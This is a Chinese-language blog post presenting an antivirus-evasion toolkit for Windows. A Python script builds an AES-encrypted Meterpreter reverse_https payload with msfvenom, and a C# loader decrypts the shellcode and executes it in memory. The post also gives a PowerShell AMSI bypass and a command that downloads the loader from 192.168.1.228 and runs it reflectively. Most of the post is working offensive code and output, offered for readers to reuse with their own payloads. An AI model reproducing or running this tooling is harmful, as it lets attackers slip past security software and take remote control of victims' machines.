Bypass Shellcode - Encryptor
VSole2022-01-03 08:55:10
生成包含 base64 编码、AES 加密的 shellcode 的 .Net 二进制文件,该 shellcode 将在 Windows 目标上执行,绕过防病毒软件。
使用meterpreter_encryptor.py来创建加密的 base64 shellcode:
root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.1.228 -l 443 -f b64 [+] Generating MSFVENOM payload... [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x64/xor_dynamic x64/xor_dynamic succeeded with size 667 (iteration=0) x64/xor_dynamic chosen with final size 667 Payload size: 667 bytes Saved as: ./msf.bin [+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec... [+] Base64 output: sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg
获取密钥和 shellcode 并将其插入ProcessInjector.cs
// decrypt the base64 payload string payload = "sZkMii [etc...]"; string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";
将 C# 代码编译成可执行文件(例如,metInject.exe)并通过 Web 服务器提供它。
将可执行文件注入远程 PowerShell 进程:
# AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', '')));
Hepl
./meterpreter_encryptor.py -h
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
optional arguments:
-h, --help show this help message and exit
-l LPORT, --lport LPORT
The local port that msfconsole is listening on.
-i LHOST, --lhost LHOST
The local host that msfconsole is listening on.
-p PAYLOAD, --payload PAYLOAD
The payload to generate in msfvenom.
-m METHOD, --method METHOD
The method to use: thread/delegate.
-k KEY, --key KEY The encryption key (32 chars).
-e ENCODER, --encoder ENCODER
The meterpreter encoder.
-f FORMAT, --format FORMAT
The format to output.
ProcessInjection.cs
using System;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.IO;
namespace ProcessInjection
{
class Program
{
public enum Protection
{
PAGE_NOACCESS = 0x01,
PAGE_READONLY = 0x02,
PAGE_READWRITE = 0x04,
PAGE_WRITECOPY = 0x08,
PAGE_EXECUTE = 0x10,
PAGE_EXECUTE_READ = 0x20,
PAGE_EXECUTE_READWRITE = 0x40,
PAGE_EXECUTE_WRITECOPY = 0x80,
PAGE_GUARD = 0x100,
PAGE_NOCACHE = 0x200,
PAGE_WRITECOMBINE = 0x400
}
[DllImport("kernel32.dll")]
static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
private delegate Int32 ShellcodeDelegate();
static void Main(string[] args)
{
Shellcode();
}
static void Shellcode()
{
// attempt heuristics/behaviour bypass
IntPtr mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if (mem == null)
{
return;
}
// decrypt the base64 payload - change these to your own encrypted payload and key
string payload = "sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";
byte[] buf = Decrypt(key, payload);
unsafe
{
fixed(byte* ptr = buf)
{
// set the memory as executable and execute the function pointer (as a delegate)
IntPtr memoryAddress = (IntPtr)ptr;
VirtualProtect(memoryAddress, (UIntPtr)buf.Length, (UInt32)Protection.PAGE_EXECUTE_READWRITE, out uint lpfOldProtect);
ShellcodeDelegate func = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(ShellcodeDelegate));
func();
}
}
}
private static byte[] Decrypt(string key, string aes_base64)
{
byte[] tempKey = Encoding.ASCII.GetBytes(key);
tempKey = SHA256.Create().ComputeHash(tempKey);
byte[] data = Convert.FromBase64String(aes_base64);
// decrypt data
Aes aes = new AesManaged();
aes.Mode = CipherMode.CBC;
aes.Padding = PaddingMode.PKCS7;
ICryptoTransform dec = aes.CreateDecryptor(tempKey, SubArray(tempKey, 16));
using (MemoryStream msDecrypt = new MemoryStream())
{
using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, dec, CryptoStreamMode.Write))
{
csDecrypt.Write(data, 0, data.Length);
return msDecrypt.ToArray();
}
}
}
static byte[] SubArray(byte[] a, int length)
{
byte[] b = new byte[length];
for (int i = 0; i < length; i++)
{
b[i] = a[i];
}
return b;
}
}
}
shellcode_encryptor.py
#!/usr/bin/env python3
import array, base64, random, string
from Crypto.Cipher import AES
from hashlib import sha256
import argparse, subprocess, os
def main():
args = parse_args()
lhost = args.lhost
lport = args.lport
key = args.key
if not key:
key = get_random_string(32)
payload = args.payload
method = args.method
format = args.format
''' generate msfvenom payload '''
print("[+] Generating MSFVENOM payload...")
result = subprocess.run(['msfvenom',
'-p', payload,
'LPORT=' + lport,
'LHOST=' + lhost,
# '-b', '\\x00',
'-f', 'raw',
'-o', './msf.bin'],
capture_output=False)
f = open("./msf.bin", "rb")
buf = f.read()
f.close()
print("[+] key and payload will be written to key.b64 and payload.b64")
''' encrypt the payload '''
print("[+] Encrypting the payload, key=" + key + "...")
hkey = hash_key(key)
encrypted = encrypt(hkey, hkey[:16], buf)
b64 = base64.b64encode(encrypted)
f = open("./key.b64", "w")
f.write(key)
f.close()
f = open("./payload.b64", "w")
f.write(b64.decode('utf-8'))
f.close()
if format == "b64":
''' base64 output '''
print("[+] Base64 output:")
print(b64.decode('utf-8'))
print("\n[+] Have a nice day!")
return
if format == "c":
''' c output '''
print("[+] C output:")
hex_string = 'unsigned char payload[] ={0x';
hex = '0x'.join('{:02x},'.format(x) for x in encrypted)
hex_string = hex_string + hex[:-1] + "};"
print(hex_string)
print("\n[+] Have a nice day!")
return
def encrypt(key,iv,plaintext):
key_length = len(key)
if (key_length >= 32):
k = key[:32]
elif (key_length >= 24):
k = key[:24]
else:
k = key[:16]
aes = AES.new(k, AES.MODE_CBC, iv)
pad_text = pad(plaintext, 16)
return aes.encrypt(pad_text)
def hash_key(key):
h = ''
for c in key:
h += hex(ord(c)).replace("0x", "")
h = bytes.fromhex(h)
hashed = sha256(h).digest()
return hashed
def pad(data, block_size):
padding_size = (block_size - len(data)) % block_size
if padding_size == 0:
padding_size = block_size
padding = (bytes([padding_size]) * padding_size)
return data + padding
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--lport", default="0.0.0.0", type=str,
help="The local port that msfconsole is listening on.")
parser.add_argument("-i", "--lhost", default="443", type=str,
help="The local host that msfconsole is listening on.")
parser.add_argument("-p", "--payload", default = "windows/x64/meterpreter/reverse_https", type=str,
help="The payload to generate in msfvenom.")
parser.add_argument("-m", "--method", default="thread", type=str,
help="The method to use: thread/delegate.")
parser.add_argument("-k", "--key", default="", type=str,
help="The encryption key (32 chars).")
parser.add_argument("-f", "--format", default="b64", type=str,
help="The format to output.")
return parser.parse_args()
def get_random_string(length):
letters = string.ascii_letters + string.digits
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
if __name__ == '__main__':
main()
VSole
网络安全专家